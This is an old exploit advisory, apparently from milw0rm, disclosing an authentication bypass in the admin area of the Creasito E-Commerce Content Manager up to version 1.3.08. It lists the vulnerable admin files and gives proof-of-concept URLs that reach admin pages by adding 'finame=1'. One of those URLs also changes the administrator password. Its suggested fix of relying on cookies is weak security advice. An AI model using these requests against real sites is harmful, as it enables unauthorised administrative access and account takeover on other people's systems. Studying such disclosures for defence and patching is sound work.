============================================================================================
Creasito E-Commerce Content Manager (admin) Authentication Bypass
============================================================================================
Product............: Creasito E-Commerce Content Manager
Affected versions..: Creasito <= 1.3.08
Security Risk......: High
Vendor.............: G. Fabozzi (http://creasito.bloghosteria.com/)
Product Link.......: http://prdownloads.sourceforge.net/creasito/creasito1.3.08.zip?download
Discovered by......: SlimTim10
Details:
---------
Files in the /admin directory use a very poor security method for authentication that is
simple to bypass.
Vulnerable Code:
-----------------
if ( empty( $finame ) ) {
?> Prego effettuare il login Qui
©Bloghosteria.com
Vulnerable Files:
------------------
(in /admin)
addnewcont.php, adminpassw.php, amministrazione.php, artins.php, bgcolor.php,
cancartcat.php, canccat.php, cancelart.php, cancontsit.php, chanpassamm.php, dele.php,
delecat.php, delecont.php, emailall.php, gestflashtempl.php, gestmagart.php, gestmagaz.php,
gestpre.php, input.php, input3.php, insnucat.php, instempflash.php, mailfc.php,
modfdati.php, rescont4.php, ricordo1.php, ricordo4.php, tabcatalg.php, tabcont.php,
tabcont3.php, tabstile.php, tabstile3.php, testimmg.php, update.php
Proof of Concept:
------------------
http://[host]/admin/amministrazione.php?finame=1
http://[host]/admin/admin/dele.php?finame=1
http://[host]/admin/chanpassamm.php?finame=1&password=testing&passver=testing *
* Changes the password as well as bypassing authentication
Solution:
----------
Use a better authentication method, like cookies!
================================================================
Shoutz: PCD, dw0rek, Tainted, str0ke!
SlimTim10
================================================================
# milw0rm.com [2006-11-03]